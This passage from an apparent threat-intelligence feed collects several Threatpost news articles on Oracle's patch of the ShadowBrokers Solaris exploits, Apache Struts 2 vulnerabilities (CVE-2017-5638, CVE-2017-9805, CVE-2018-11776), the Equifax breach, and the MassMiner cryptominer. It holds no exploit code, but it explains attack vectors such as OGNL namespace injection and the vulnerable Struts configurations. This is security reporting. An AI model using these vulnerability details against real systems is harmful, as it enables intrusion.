remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:49:59", "description": "Though it falls squarely into the trend of cryptominers setting their sights on the Monero virtual currency, the MassMiner malware family is adding its own special somethin\u2019-somethin\u2019 to the mix. It targets Windows servers with a variety of recent and well-known exploits \u2013 all within a single executable.\n\nIn fact, MassMiner uses a veritable cornucopia of attacks: The [EternalBlue](<https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/>) National Security Agency hacking tool ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)), which it uses to install DoublePulsar and the Gh0st RAT backdoor to establish persistence; an exploit for the well-known Apache Struts flaw that led to the Equifax breach ([CVE-2017-5638](<http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html>)); and an exploit for Oracle\u2019s WebLogic Java application server ([CVE-2017-10271](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>)). It also uses the SQLck tool to gain brute-force access to Microsoft SQL Servers, and it even incorporates a fork of MassScan, a legitimate tool that can scan the internet in under six minutes.\n\n\u201cIt surprised us how many different exploits and hacking tools it leverages,\u201d said AlienVault researchers Chris Doman and Fernando Martinez, who analyzed the code.\n\nThey added that the malware family comprises many different versions, but they all spread first within the local network of its initial host, before attempting to propagate across the wider internet.\n\nAs for the anatomy of the attack, compromised Microsoft SQL Servers are first subjected to scripts that install MassMiner and disable a number of important security features and anti-virus protections.\n\nOnce the malware has been installed, it sets about mining for Monero and hooking up with a crypto-wallet and mining pool; it also connects with its C2 server for updates, and configures itself to infect other machines on the network. Meanwhile, a short VisualBasic script is used to deploy the malware to compromised Apache Struts servers, and it moves laterally by replicating itself like a worm. MassScan meanwhile passes a list of both private and public IP ranges to scan during execution, to find fresh server targets out on the web that it can break into with the SQLck brute-force tool.\n\nSo far, the criminals behind the malware have been successful with this kitchen-sink approach: AlienVault in its [analysis](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>) identified two Monero wallets belonging to the attackers.\n\nThe success is unsurprising, according to Ruchika Mishra, director of products and solutions at Balbix.\n\n\u201cGiven [the workforce skills shortage], it\u2019s not hard to imagine a multi-pronged attack such as MassMiner bypassing security systems and staying under the radar with relative ease,\u201d Mishra said via email. \u201cWith the proliferation of coin-mining attacks in 2017 and 2018, I foresee continued innovation and a significant uptick in complexity as the barrier to entry for attackers lowers and iterations of successful exploits become more readily available on the Dark Web.\u201d\n\nWorryingly, other capabilities in the bad code suggest that 